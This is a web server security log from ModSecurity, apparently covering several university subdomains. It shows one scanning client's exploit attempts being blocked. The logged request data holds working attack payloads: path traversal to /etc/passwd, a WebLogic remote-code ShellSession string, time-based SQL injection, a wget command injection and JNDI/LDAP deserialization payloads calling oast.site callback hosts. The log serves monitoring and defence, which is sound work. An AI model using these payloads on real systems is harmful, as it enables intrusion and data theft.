[Tue Aug 29 11:31:44.317158 2023] [:error] [pid 1063] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "ft.unla.ac.id"] [uri "/soap.cgi"] [unique_id "ZO10sMCo-f0AAAQnF34AAAAF"]
[Tue Aug 29 11:31:44.317289 2023] [:error] [pid 1063] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "ft.unla.ac.id"] [uri "/soap.cgi"] [unique_id "ZO10sMCo-f0AAAQnF34AAAAF"]
[Tue Aug 29 11:31:44.325326 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:progressfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:progressfile: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/usc-e-shop/functions/progress-check.php"] [unique_id "ZO10sMCo-f0AAAN@5IgAAAAO"]
[Tue Aug 29 11:31:44.328744 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "journal.unla.ac.id"] [uri "/soap.cgi"] [unique_id "ZO10sMCo-f0AAAP5mKEAAAAM"]
[Tue Aug 29 11:31:44.328795 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "journal.unla.ac.id"] [uri "/soap.cgi"] [unique_id "ZO10sMCo-f0AAAP5mKEAAAAM"]
[Tue Aug 29 11:31:44.334438 2023] [:error] [pid 1020] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "pusatbahasa.unla.ac.id"] [uri "/soap.cgi"] [unique_id "ZO10sMCo-f0AAAP8G04AAAAV"]
[Tue Aug 29 11:31:44.334477 2023] [:error] [pid 1020] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "pusatbahasa.unla.ac.id"] [uri "/soap.cgi"] [unique_id "ZO10sMCo-f0AAAP8G04AAAAV"]
[Tue Aug 29 11:31:44.335321 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:progressfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:progressfile: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/usc-e-shop/functions/progress-check.php"] [unique_id "ZO10sMCo-f0AAAQR46sAAAAz"]
[Tue Aug 29 11:31:44.336117 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "informatika.unla.ac.id"] [uri "/soap.cgi"] [unique_id "ZO10sMCo-f0AAAPMmKMAAAAY"]
[Tue Aug 29 11:31:44.336189 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "informatika.unla.ac.id"] [uri "/soap.cgi"] [unique_id "ZO10sMCo-f0AAAPMmKMAAAAY"]
[Tue Aug 29 11:31:44.336487 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:progressfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:progressfile: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/usc-e-shop/functions/progress-check.php"] [unique_id "ZO10sMCo-f0AAAQkBXoAAAAC"]
[Tue Aug 29 11:31:44.340538 2023] [:error] [pid 1018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:handle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  = ( found within ARGS:handle: com.tangosol.coherence.mvel2.sh.ShellSession(\\x22weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread();\\x0d\\x0aweblogic.work.WorkAdapter adapter = executeThread.getCurrentWork();\\x0d\\x0ajava.lang.reflect.Field field = adapter.getClass().getDeclaredField(\\x22connectionHandler\\x22);\\x0d\\x0afield.setAccessible(true);\\x0d\\x0aObject obj = field.get(adapter);\\x0d\\x0aweblogic.servlet.internal.ServletRequestImpl req = (weblog..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/console/css/%2e%2e%2fconsole.portal"] [unique_id "ZO10sMCo-f0AAAP6NPEAAAAQ"]
[Tue Aug 29 11:31:44.341239 2023] [:error] [pid 1029] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:handle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  = ( found within ARGS:handle: com.tangosol.coherence.mvel2.sh.ShellSession(\\x22weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread();\\x0d\\x0aweblogic.work.WorkAdapter adapter = executeThread.getCurrentWork();\\x0d\\x0ajava.lang.reflect.Field field = adapter.getClass().getDeclaredField(\\x22connectionHandler\\x22);\\x0d\\x0afield.setAccessible(true);\\x0d\\x0aObject obj = field.get(adapter);\\x0d\\x0aweblogic.servlet.internal.ServletRequestImpl req = (weblog..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/console/css/%2e%2e%2fconsole.portal"] [unique_id "ZO10sMCo-f0AAAQFcUAAAAAn"]
[Tue Aug 29 11:31:44.344476 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:progressfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:progressfile: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/usc-e-shop/functions/progress-check.php"] [unique_id "ZO10sMCo-f0AAAQMrvQAAAAu"]
[Tue Aug 29 11:31:44.352698 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:handle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  = ( found within ARGS:handle: com.tangosol.coherence.mvel2.sh.ShellSession(\\x22weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread();\\x0d\\x0aweblogic.work.WorkAdapter adapter = executeThread.getCurrentWork();\\x0d\\x0ajava.lang.reflect.Field field = adapter.getClass().getDeclaredField(\\x22connectionHandler\\x22);\\x0d\\x0afield.setAccessible(true);\\x0d\\x0aObject obj = field.get(adapter);\\x0d\\x0aweblogic.servlet.internal.ServletRequestImpl req = (weblog..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/console/css/%2e%2e%2fconsole.portal"] [unique_id "ZO10sMCo-f0AAAP5mKIAAAAM"]
[Tue Aug 29 11:31:44.358886 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:handle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  = ( found within ARGS:handle: com.tangosol.coherence.mvel2.sh.ShellSession(\\x22weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread();\\x0d\\x0aweblogic.work.WorkAdapter adapter = executeThread.getCurrentWork();\\x0d\\x0ajava.lang.reflect.Field field = adapter.getClass().getDeclaredField(\\x22connectionHandler\\x22);\\x0d\\x0afield.setAccessible(true);\\x0d\\x0aObject obj = field.get(adapter);\\x0d\\x0aweblogic.servlet.internal.ServletRequestImpl req = (weblog..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/console/css/%2e%2e%2fconsole.portal"] [unique_id "ZO10sMCo-f0AAAQkBXsAAAAC"]
[Tue Aug 29 11:31:44.359575 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:meta_ids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:meta_ids: 1 AND (SELECT 3066 FROM (SELECT(SLEEP(6)))CEHy)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10sMCo-f0AAAPDn8IAAAAP"]
[Tue Aug 29 11:31:44.362815 2023] [:error] [pid 854] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "unla.ac.id"] [uri "/soap.cgi"] [unique_id "ZO10sMCo-f0AAANWgUwAAAAG"]
[Tue Aug 29 11:31:44.362863 2023] [:error] [pid 854] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "unla.ac.id"] [uri "/soap.cgi"] [unique_id "ZO10sMCo-f0AAANWgUwAAAAG"]
[Tue Aug 29 11:31:44.364518 2023] [:error] [pid 918] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:meta_ids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:meta_ids: 1 AND (SELECT 3066 FROM (SELECT(SLEEP(6)))CEHy)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10sMCo-f0AAAOW380AAAAg"]
[Tue Aug 29 11:31:44.365302 2023] [:error] [pid 1027] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ztd_password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:ztd_password: $(/bin/wget$IFShttp:/cjmn8l5jmimk2adbbnlgg7ekhunnn5ypz.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/Collector/nms/addModifyZTDProxy"] [unique_id "ZO10sMCo-f0AAAQDFVAAAAAl"]
[Tue Aug 29 11:31:44.365594 2023] [:error] [pid 1063] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:meta_ids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:meta_ids: 1 AND (SELECT 3066 FROM (SELECT(SLEEP(6)))CEHy)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10sMCo-f0AAAQnF4AAAAAF"]
[Tue Aug 29 11:31:44.368602 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:meta_ids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:meta_ids: 1 AND (SELECT 3066 FROM (SELECT(SLEEP(6)))CEHy)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10sMCo-f0AAAPMmKQAAAAY"]
[Tue Aug 29 11:31:44.375302 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:meta_ids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:meta_ids: 1 AND (SELECT 3066 FROM (SELECT(SLEEP(6)))CEHy)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10sMCo-f0AAAPiBkwAAAAB"]
[Tue Aug 29 11:31:44.383573 2023] [:error] [pid 1033] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:progressfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:progressfile: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/usc-e-shop/functions/progress-check.php"] [unique_id "ZO10sMCo-f0AAAQJWwgAAAAr"]
[Tue Aug 29 11:31:44.383842 2023] [:error] [pid 1045] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:handle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  = ( found within ARGS:handle: com.tangosol.coherence.mvel2.sh.ShellSession(\\x22weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread();\\x0d\\x0aweblogic.work.WorkAdapter adapter = executeThread.getCurrentWork();\\x0d\\x0ajava.lang.reflect.Field field = adapter.getClass().getDeclaredField(\\x22connectionHandler\\x22);\\x0d\\x0afield.setAccessible(true);\\x0d\\x0aObject obj = field.get(adapter);\\x0d\\x0aweblogic.servlet.internal.ServletRequestImpl req = (weblog..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/console/css/%2e%2e%2fconsole.portal"] [unique_id "ZO10sMCo-f0AAAQV4PAAAAA3"]
[Tue Aug 29 11:31:44.384402 2023] [:error] [pid 1020] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:progressfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:progressfile: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/usc-e-shop/functions/progress-check.php"] [unique_id "ZO10sMCo-f0AAAP8G1AAAAAV"]
[Tue Aug 29 11:31:44.385606 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "www.unla.ac.id"] [uri "/soap.cgi"] [unique_id "ZO10sMCo-f0AAAQkBXwAAAAC"]
[Tue Aug 29 11:31:44.385668 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "www.unla.ac.id"] [uri "/soap.cgi"] [unique_id "ZO10sMCo-f0AAAQkBXwAAAAC"]
[Tue Aug 29 11:31:44.415627 2023] [:error] [pid 1024] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:meta_ids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:meta_ids: 1 AND (SELECT 3066 FROM (SELECT(SLEEP(6)))CEHy)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10sMCo-f0AAAQA-@kAAAAi"]
[Tue Aug 29 11:31:44.538092 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:handle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  = ( found within ARGS:handle: com.tangosol.coherence.mvel2.sh.ShellSession(\\x22weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread();\\x0d\\x0aweblogic.work.WorkAdapter adapter = executeThread.getCurrentWork();\\x0d\\x0ajava.lang.reflect.Field field = adapter.getClass().getDeclaredField(\\x22connectionHandler\\x22);\\x0d\\x0afield.setAccessible(true);\\x0d\\x0aObject obj = field.get(adapter);\\x0d\\x0aweblogic.servlet.internal.ServletRequestImpl req = (weblog..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/console/css/%2e%2e%2fconsole.portal"] [unique_id "ZO10sMCo-f0AAAP5mKMAAAAM"]
[Tue Aug 29 11:31:45.324569 2023] [:error] [pid 1037] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:argumentCollection. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '/></ found within ARGS:argumentCollection: <wddxPacket version='1.0'><header/><data><struct type='xcom.sun.rowset.JdbcRowSetImplx'><var name='dataSourceName'><string>ldap://cjmn8l5jmimk2adbbnlgq41w6eqqt7yq1.oast.site/rcrzfd</string></var><var name='autoCommit'><boolean value='true'/></var></struct></data></wddxPacket>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/CFIDE/adminapi/accessmanager.cfc"] [unique_id "ZO10scCo-f0AAAQNwH4AAAAv"]
[Tue Aug 29 11:31:45.414852 2023] [:error] [pid 1028] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:argumentCollection. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '/></ found within ARGS:argumentCollection: <wddxPacket version='1.0'><header/><data><struct type='xcom.sun.rowset.JdbcRowSetImplx'><var name='dataSourceName'><string>ldap://cjmn8l5jmimk2adbbnlgjcgyrsaa8wub5.oast.site/rcrzfd</string></var><var name='autoCommit'><boolean value='true'/></var></struct></data></wddxPacket>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/CFIDE/adminapi/accessmanager.cfc"] [unique_id "ZO10scCo-f0AAAQEGM8AAAAm"]
[Tue Aug 29 11:31:45.427408 2023] [:error] [pid 1045] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id: (SELECT 1337 FROM (SELECT(SLEEP(6)))MrMV)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10scCo-f0AAAQV4PIAAAA3"]
[Tue Aug 29 11:31:45.428797 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:argumentCollection. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '/></ found within ARGS:argumentCollection: <wddxPacket version='1.0'><header/><data><struct type='xcom.sun.rowset.JdbcRowSetImplx'><var name='dataSourceName'><string>ldap://cjmn8l5jmimk2adbbnlgkfqz9myfaqxxx.oast.site/rcrzfd</string></var><var name='autoCommit'><boolean value='true'/></var></struct></data></wddxPacket>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/CFIDE/adminapi/accessmanager.cfc"] [unique_id "ZO10scCo-f0AAAP@M2YAAAAZ"]
